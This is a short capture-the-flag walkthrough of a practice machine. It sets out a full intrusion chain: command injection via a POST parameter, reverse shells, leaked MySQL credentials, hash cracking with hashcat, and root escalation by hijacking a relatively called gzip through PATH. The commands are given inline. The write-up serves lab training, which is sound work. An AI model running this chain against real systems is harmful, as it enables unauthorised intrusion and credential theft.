nmap -sT -sV -A -v <ip> shows us ports 22 and 80.
gobuster dir -x .php,.txt,.html -u <ip> -w <wordlist> finds a couple files. The most relevant right now is "accounts.php". Going to any of these files results in a redirection to the login page.
Create an account by POSTing to the "accounts.php" page a new username, a password, and a confirmation of the password. We will use the credentials "addie:passie": curl -X POST -d 'username=addie&password=passie&confirm=passie' <ip>. Login to the site with out new account and navigate to "FILES". Download the "SITEBACKUP.ZIP" file, unzip, and check the "logs.php" source code. We are able to inject commands via the "delim" parameter in a POST request to this page. The curl command to accomplish this is: curl -X POST -d 'delim=space; $(<command>)'. Start a reverse shell back to our machine.
Going back to the zip file, we can dump the "config.php" file, disclosing the credentials to the MySQL database the site uses. Accessing the database allows us to obtain the hashed password of "m4lwhere"'s password: mysql -u root -p'mySQL_p@ssw0rd!:)' previse <<< 'SHOW TABLES; SELECT * FROM accounts WHERE username = 'm4lwhere';'. Using hashcat and the "rockyou.txt" wordlist we can crack this hash: hashcat -m 500 -a 0 '<hash>' <wordlist>. Using this password, we can login to m4lwhere's account on the box via ssh. cat user.txt to get the user flag.
sudo -l shows us the path to a script which uses "gzip" to zip two files. It calls "gzip" relatively, meaning we can hijack the command to execute our own code. Move to a writable directory (/tmp) and create a file named "gzip". In the file, create a reverse shell back to our machine. Export the current directory to our PATH env: export PATH=/tmp:$PATH. Start a netcat listener on our machine and run the script as root. cat /root/root.txt to get root flag.
Last edit: 2021.08.20